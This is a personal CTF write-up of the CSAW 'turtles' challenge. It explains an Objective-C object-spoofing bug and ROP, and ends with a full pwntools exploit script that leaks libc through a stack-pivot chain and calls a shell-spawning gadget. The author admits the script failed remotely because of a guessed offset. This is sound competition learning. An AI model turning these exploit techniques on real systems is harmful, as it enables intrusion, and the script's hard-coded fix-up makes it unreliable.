CSAW Write-up: Turtles

This past weekend, me and my team played CSAW CTF after taking quite a long break. We managed to hold top-20 for a good portion of the competition, even going as high as 12th place. Even though we lost our breath by the final day and finished in 40th, I am extremely proud of my team; both the returning veterans and the new players we invited to play with us.

I conquered multiple fun challenges during CSAW, but turtles stands out as a challenge which taught me some important lessons.

Challenge Breakdown

As is usual, turtles starts with some flavor text to introduce the challenge:

Looks like you found a bunch of turtles but their shells are nowhere to be seen! Think you can make a shell for them?

nc pwn.chal.csaw.io 9003

Digging into the disassembly reveals the binary's origin: an Objective-C development environment. There are no bugs here; instead, the code performs the alloc() and init() routines to instantiate a class named Turtle:

Next, it leaks the address of that class, reads in 2064 bytes, then copies the first 200 bytes directly over the Turtle object, effectively allowing us to spoof the entirety of the object instance:

Finally, it looks up and calls a member function named say(), then promptly calls release() to clean up:

Peering Into Objective-C

The next logical step is to figure out what objc_msg_lookup does internally. Digging into the code exposes a very complex function, but there's one path which is easy to reach and simple to understand. Here it is:

Okay, let's look at that again, this time with some high-level annotations:

Essentially, this function returns *(*(*class) + 0x40) + 0x08) as long as we fail the check *rsi < *(*(*class) + 0x40) + 0x28). There is some code out of view, but it is inconsequential: if the object gets beyond this, the rest shouldn't matter.

Exploitation

That's everything we need to know to begin exploitation: we can trick the say() call into calling any code we desire. The most basic form of a payload is something like this:

payload = ""
payload += p64(leak + 0x10)    # +0x00: rdi (point to slack)
payload += p64(leak + 0x10)    # +0x08: (point to slack)
payload += "\x00" * 0x40       # +0x10: slack
payload += p64(leak + 0x50)    # +0x50: rdx from [rbp+0x40] (point to self)
payload += p64(leak + 0x60)    # +0x58: rax from [rdx+0x08] (pointer to next)
payload += p64(func_to_call)   # +0x60: call and win
payload += "\x00" * 0x28       # +0x68: slack

But, of course, it's not so simple. The leaked address is in the heap, which can't help us locate any functions. The main binary is extremely small, and is the only thing not randomized with ASLR.

Now, this is where I made the first few mistakes.

First off, I forgot I had a total of 2064 stack bytes, and relegated myself to the 200 in the object buffer.

Additionally, I only had about an hour left in the competition and was in a rush to finish, which lead to tunnel-vision and eventually an overly complex ROP chain.

I'll be doing the rest of this blog in first-person. I normally try to stick to second-person in order to include my readers in the process of figuring out an exploit but... This was actually a failure. Well, a partial failure, but keep reading anyways.

The binary contained no magic gadgets, but I knew there would be some in libc. Because ASLR prevented me from moving forward, I set out to build a ROP chain which could leak the address of libc. Mistakenly working with only 200 bytes, I created a tight-but-complex chain using this collection of gadgets from the main binary:

# 0x400cc9                  # 0x400b82                  # 0x400d43
pop rbp                     leave                       pop rdi
retn                        retn                        retn

# 0x400d3b                  # 0x400d41
pop rbp                     pop rsi
pop r12                     pop r15
pop r13                     retn
pop r14
pop r15
retn

ROP means Return Oriented Programming. If you don't have a write primitive in executable memory, you cannot just ship your own shellcode with an exploit. Instead, you need to use code which already exists in the program. Even with what we call magic gadgets, or existing areas of code which can pop shells, you still typically need to do some setup logic. That is where ROP comes into play. By causing a chain of returns into pieces of existing code, called gadgets, you can instrument a vulnerable program to execute code. A collection of gadgets is called a ROP Chain.

The criteria for what can be a gadget is simple: a few useful instructions, and maybe some irrelevant ones, tailed by a retn. This final instruction allows the chain to continue executing the next gadget. In some cases, you might instead tail with call register or something else.

I cannot even begin to describe the chain in text, so the best I can do is this diagram showing the flow:

Quick note: rsp starts on this buffer in the stack, but pivots to this buffer in the heap on the third gadget. That's why it's not obvious how the blue gadget (initially invoked by the call rax after objc_msg_lookup()) returns into the aqua gadget and then the first pink gadget, kicking off the first stack pivot.

Before clarifying some details, here is a still of the final frame:

So, this chain culminates with a call to printf() which spits out the address of printf(), allowing me to calculate the address of a magic /bin/sh gadget. It makes this call by jumping into the middle of main() and re-using the existing call. The point of this was to re-trigger the code and allow for a stage two. This is evident if you look at offset 0x30; the pivot left me with a crazy rbp, so I had to set it far enough past the heap buffer that the impending read() and memcpy calls would work.

Disregarding humility, I would call this a very cool ROP chain. Backed into a corner with limited space and time, I pulled off something pretty complex. Only, remember, my space wasn't limited. My mistake lead to such an over-complication of attack, simply because I didn't realize I had essentially infinite stack to work with. This ate into my time, something that actually was limited.

To start the second stage, I used my "most basic payload":

payload = ""
payload += p64(leak + 0x10)    # +0x00: rdi (point to slack)
payload += p64(leak + 0x10)    # +0x08: (point to slack)
payload += "\x00" * 0x40       # +0x10: slack
payload += p64(leak + 0x50)    # +0x50: rdx from [rbp+0x40] (point to self)
payload += p64(leak + 0x60)    # +0x58: rax from [rdx+0x08] (pointer to next)
payload += p64(magic_gadget)   # +0x60: call and win
payload += "\x00" * 0x28       # +0x68: slack

Then I dropped it in gdb and stepped through everything. It worked, but rbp wasn't where I expected. It was 12:49. I had gotten stage one working at 12:47, and the competition was eleven minutes from over. I had no time at all to write a proper stage two, and I was fully aware of the clock. So I cheated. Rather than figuring out where rbp was and why, I just did the math: in gdb it was 0x8980 bytes before the original payload heap buffer. Before crafting my payload, I added one line to fix up the references:

leak -= 0x8980

Then I ran it locally:

It worked. I was ecstatic. So, at 12:56, I threw it at the server. It failed.

Four minutes left, and I had failed. I knew right away it was overwhelmingly likely that 0x8980 happened through a series of circumstantial pointer-hops which weren't reflected in the server's memory layout. I didn't get the flag on time.

This is Why We Play

Whenever a somebody tells me they aren't good at CTF, or they wish they were better, or they'll never match up, I always reply with this is why we play.

This challenge was very helpful. It taught me that I might be good at understanding and crafting complex controls flows, but that's irrelevant if I'm not staying aware of the entire problem context. It taught me I could have had a better understanding of Objective-C internals (this was my first encounter). It made me realize that, whenever my chain is getting too complex, I might want to step back and reevaluate what I have to work with. I've seen other solves of this, and they were so elegant.

This isn't the first challenge which gave me pause this time around. I solved alien invasion (I wanna blog it soon) without using the UaF, double-free, or null-byte overwrite bugs. I knew they were there, but I knew how to solve it without them. My solution worked, and it was quite stable. But it was overly complex, simply because I would have rather crawled in the mud than learn how to properly exploit the libc allocator.

The main restraining factor on my CTF skills is my ability to over-complicate problems rather than investing time to learn more techniques. I need to get out of my comfort zone and force myself to go the unfamiliar route.

Thanks for reading, I hope you learned something! Here's the exploit code (copy into an editor to see my ROP chain ascii art):

from pwn import *
from parse import parse

local_info = ['./turtles', '/lib/x86_64-linux-gnu/libc-2.23.so']
remote_info = ['pwn.chal.csaw.io', 9003, 'libc-2.19.so']

libc_path = ''
if (args.REMOTE):
	libc_path = remote_info[2]
	io = remote(remote_info[0], remote_info[1])
else:
	libc_path = local_info[1]
	io = process(local_info[0], raw=False)

if (len(libc_path) > 0):
	libc = ELF(libc_path)
binary = ELF(local_info[0])


raw_input()

line = io.recvline()
leak = parse('Here is a Turtle: 0x{}', line)[0]
leak = int(leak, 16)

log.info("Leaked Heap:            0x%016x" % leak)

# stage 1, leak printf
payload = ""
payload += p64(leak + 16)             # rdi
payload += p64(leak + 16)             # 
payload += p64(0x400cc9)              # pop rbp; retn --.  <---------------------------------------.
payload += p64(leak + 144)            # new stack here  |                                          |
payload += p64(0x400b82)              # leave; retn <---'  (pivot 1)                               |
payload += "lk: %s\n\x00"             # fmt     '--------------------------------------------.     |
payload += p64(leak + 0x830 + 96)     # [ebp for stage 2, point to this buffer]              |     |
                                      #                                                      |     |
                                      # [start of new stack from pivot 2]                    |     |
payload += p64(0x400d43)              # pop rdi; ret <---------------------------------------+-----+----.
payload += p64(leak + 40)             # value for rdi (pointer to %s fmt string)             |     |    |
payload += p64(0x400c39)              # call print(), leak libc, and start over              |     |    |
                                      #                                                      |     |    |
                                      #                                                      |     |    |
payload += p64(leak + 16 + 0x40)      # rdx from [rbp+0x40] (point to self)                  |     |    |
payload += p64(leak + 16 + 0x40 + 16) # rax from [rdx+0x08] (pointer to next)                |     |    |
payload += p64(0x400d3b)              # pop rbp; pop r12; pop r13; pop r14; pop r15; retn ---+-----'    |
payload += "\x00" * 0x28              # slack                                                |          |
                                      # [start of new stack from pivot 1]                    |          |
payload += p64(leak + 48)             # [rbp for pivot 1]                                    |          |
payload += p64(0x400d41)              # pop rsi; pop r15; ret <------------------------------'          |
                                      #                    '-----------------------------.              |
payload += p64(0x601290) * 2          # value for rsi and r15 (pointer to printf@GOT)    |              |
payload += p64(0x400b82)              # leave; retn <------------------------------------'              |
                                      #          '------------------------------------------------------'
io.sendline(payload)

# parse the leak and do some math
line = io.recvline()
#printf_leak = '\x00' + parse('lk: {}\n', line)[0][:-1] # add the 0x00 we skip over and remove the extra byte [ works locally, but need to change 0x601290 to 0x601290 because null term alignment]
printf_leak = parse('lk: {}\n', line)[0]
while len(printf_leak) < 8:
	printf_leak += '\x00'
printf_leak = u64(printf_leak)


libc_printf = libc.symbols['printf']
libc_system = 0x41374 # offset of magic gadget
system_leak = printf_leak + (libc_system - libc_printf)
log.info("libc::printf() offset:    0x%016x" % libc_printf)
log.info("Leaked libc::printf():    0x%016x" % printf_leak)
log.info("Inferred libc::system():  0x%016x" % system_leak)

# stage 2, call magic gadget
leak -= 0x8980 # our leak now points hereish and im not sure why?
payload2 = ""
payload2 += p64(leak + 16)             # rdi (point to slack)
payload2 += p64(leak + 16)             # (point to slack)
payload2 += "\x00" * (0x40)            # slack
payload2 += p64(leak + 16 + 0x40)      # rdx from [rbp+0x40] (point to self)
payload2 += p64(leak + 16 + 0x40 + 16) # rax from [rdx+0x08] (pointer to next)
payload2 += p64(system_leak)           # call and win
payload2 += "\x00" * 0x28              # slack

io.sendline(payload2)
io.interactive()```